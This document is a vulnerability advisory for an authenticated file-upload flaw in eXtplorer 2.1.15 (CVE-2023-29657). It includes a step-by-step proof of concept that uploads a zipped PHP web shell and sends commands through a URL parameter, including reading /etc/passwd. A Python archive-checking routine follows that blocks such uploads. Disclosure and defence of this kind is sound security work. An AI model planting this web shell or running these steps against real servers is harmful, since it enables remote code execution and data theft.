CVE-2023-29657: eXtplorer 2.1.15 – Arbitrary File Upload – Tristão Marinho

eXtplorer 2.1.15 is vulnerable to insecure permissions: the file upload function in the file manager allows uploading a zip file containing PHP pages, which can then be extracted into the web root and lead to arbitrary code execution.


# Title: eXtplorer 2.1.15 – Arbitrary File Upload Remote following Code Execution (Authenticated)

Date: 2022-11-09
Author: Francisco Marinho
Vendor Homepage: http://extplorer.net/
Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip
Version: 2.1.15
Tested on: Linux

==========> POC <==========

1- Log in with your account
2- Access the directory /index.php
3- Create a home.php file containing <?php system($_GET['tristao']); ?>
4- Zip the file as home.zip
5- Upload the zip file to the application
6- Right-click on the zip file home.zip and click "extract file"
7- Go to http://exemple.com/home.php?tristao=id

Examples:
cat /etc/passwd
/index.php?tristao=cat%20%20/etc/passwd
ls -la
/index.php?tristao=ls%20-la

Procedure

http://tristaomarinho.com/home.php?tristao=id

http://tristaomarinho.com/home.php?tristao=ls%20-la

http://tristaomarinho.com/home.php?tristao=cat%20%20/etc/passwd
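The flaw above comes down to extracting an uploaded archive into a web-served directory without looking at what it contains. The following Python check is an added defensive example, not code from the advisory or from the eXtplorer project; it inspects an archive before extraction and refuses it when any entry carries a PHP-executable extension or a path that escapes the target directory. The extension list is an assumption about common PHP handler mappings, and the sample archives are constructed in memory.

```python
import io
import posixpath
import zipfile

# Extensions a typical web server hands to the PHP interpreter (assumed list).
# ".php" is the one the eXtplorer 2.1.15 report abuses; the rest are common aliases.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}


def archive_policy_violations(zip_bytes: bytes) -> list[str]:
    """Return reasons this archive must not be extracted into the web root.

    An empty list means no entry has an executable extension and no entry
    escapes the target directory. The archive is only inspected, never written.
    """
    violations = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Normalise to a POSIX path so "..\\x", "a/../../x" and "/x" are all caught.
            norm = posixpath.normpath(name.replace("\\", "/"))
            if norm.startswith("/") or norm == ".." or norm.startswith("../"):
                violations.append(f"path escapes target directory: {name!r}")
            # Check every extension segment, not just the last one: "shell.php.jpg"
            # still reaches the PHP handler on servers with multi-extension matching.
            base = posixpath.basename(norm).lower()
            segments = base.split(".")[1:]
            if any("." + seg in EXECUTABLE_EXTENSIONS for seg in segments):
                violations.append(f"executable extension in entry: {name!r}")
    return violations


def build_sample_zip(entries: dict[str, bytes]) -> bytes:
    """Construct an in-memory archive for testing (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    rejected = build_sample_zip({"home.php": b"<?php echo 'x'; ?>", "notes.txt": b"hello"})
    accepted = build_sample_zip({"report.pdf": b"%PDF-1.4", "img/logo.png": b"\x89PNG"})
    print(archive_policy_violations(rejected))  # one violation for home.php
    print(archive_policy_violations(accepted))  # []
```

The check belongs in the server-side extract handler alongside the existing authentication, since the report's attacker is a logged-in user; logging each rejection gives a simple detection signal for attempts.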
